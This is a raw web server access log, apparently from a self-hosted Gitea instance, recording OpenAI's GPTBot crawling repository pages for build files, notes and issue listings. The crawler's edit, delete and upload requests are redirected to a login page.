"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" +[17/Feb/2026:17:27:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 72036] [Gzip 33.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" +[17/Feb/2026:17:27:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 28704] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" +[17/Feb/2026:17:27:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 10985] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:17:27:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11374] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:17:27:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11374] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:17:27:42 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/bin/python3.12" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/python3.12" +[17/Feb/2026:17:27:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/bin/python3.12" +[17/Feb/2026:17:27:43 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/bin/python3.12" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/python3.12" +[17/Feb/2026:17:27:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/bin/python3.12" +[17/Feb/2026:17:27:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 10986] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:17:27:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresWatchdog/.vscode/tasks.json" [Client 74.7.227.38] [Length 9812] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/.vscode/tasks.json" +[17/Feb/2026:17:27:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresWatchdog/.vscode/tasks.json" [Client 74.7.227.38] [Length 11841] [Gzip 4.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/.vscode/tasks.json" +[17/Feb/2026:17:27:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresWatchdog/.vscode/tasks.json" [Client 74.7.227.38] [Length 1127] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/.vscode/tasks.json" +[17/Feb/2026:17:27:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresWatchdog/.vscode/tasks.json" [Client 74.7.227.38] [Length 880] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/.vscode/tasks.json" +[17/Feb/2026:17:27:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11343] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:17:27:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 10960] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:17:27:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11374] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:17:27:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11374] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:17:27:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 10986] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:17:27:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 10986] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:17:27:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/.Notebook/OpcTest%20program%20by%20claude.md" [Client 74.7.227.38] [Length 15907] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook" +[17/Feb/2026:17:27:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10037] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:17:27:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10168] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=farduedate&state=all&type=all" +[17/Feb/2026:17:27:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c?display=source" [Client 74.7.227.38] [Length 33391] [Gzip 10.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" +[17/Feb/2026:17:27:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c?display=rendered" [Client 74.7.227.38] [Length 11131] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" +[17/Feb/2026:17:27:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs" [Client 74.7.227.38] [Length 10657] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:17:27:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11915] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:17:27:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild" [Client 74.7.227.38] [Length 238978] [Gzip 16.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build" +[17/Feb/2026:17:27:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fmain" [Client 74.7.227.38] [Length 24150] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/main" +[17/Feb/2026:17:27:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10047] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?project=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:17:27:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/tags" [Client 74.7.227.38] [Length 7732] [Gzip 2.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage" +[17/Feb/2026:17:27:56 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/.Notebook/OpcTest%20program%20by%20claude.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook/OpcTest%20program%20by%20claude.md" +[17/Feb/2026:17:27:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/.Notebook/OpcTest%20program%20by%20claude.md" +[17/Feb/2026:17:27:56 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/.Notebook/OpcTest%20program%20by%20claude.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook/OpcTest%20program%20by%20claude.md" +[17/Feb/2026:17:27:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/.Notebook/OpcTest%20program%20by%20claude.md" +[17/Feb/2026:17:27:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10164] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?project=-1&sort=farduedate&state=all&type=all" +[17/Feb/2026:17:27:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/.Notebook/OpcTest%20program%20by%20claude.md" [Client 74.7.227.38] [Length 24705] [Gzip 15.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook/OpcTest%20program%20by%20claude.md" +[17/Feb/2026:17:27:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 13073] [Gzip 6.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/controller-next-todo.md" +[17/Feb/2026:17:27:59 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/PostgresMonitor/build/PostgresWatchdog/localpycs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs" +[17/Feb/2026:17:27:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/PostgresMonitor/build/PostgresWatchdog/localpycs" +[17/Feb/2026:17:27:59 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresMonitor/build/PostgresWatchdog/localpycs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs" +[17/Feb/2026:17:27:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresMonitor/build/PostgresWatchdog/localpycs" +[17/Feb/2026:17:28:00 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresMonitor/build/PostgresWatchdog/localpycs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs" +[17/Feb/2026:17:28:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresMonitor/build/PostgresWatchdog/localpycs" +[17/Feb/2026:17:28:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 11204] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs" +[17/Feb/2026:17:28:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs" [Client 74.7.227.38] [Length 9868] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs" +[17/Feb/2026:17:28:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11914] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:17:28:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11914] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:17:28:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11917] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:17:28:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" [Client 74.7.227.38] [Length 10270] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:17:28:03 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/.Notebook/OpcTest%20program%20by%20claude.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/.Notebook/OpcTest%20program%20by%20claude.md" +[17/Feb/2026:17:28:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/.Notebook/OpcTest%20program%20by%20claude.md" +[17/Feb/2026:17:28:04 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/controller-next-todo.md" +[17/Feb/2026:17:28:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/controller-next-todo.md" +[17/Feb/2026:17:28:04 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/controller-next-todo.md" +[17/Feb/2026:17:28:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 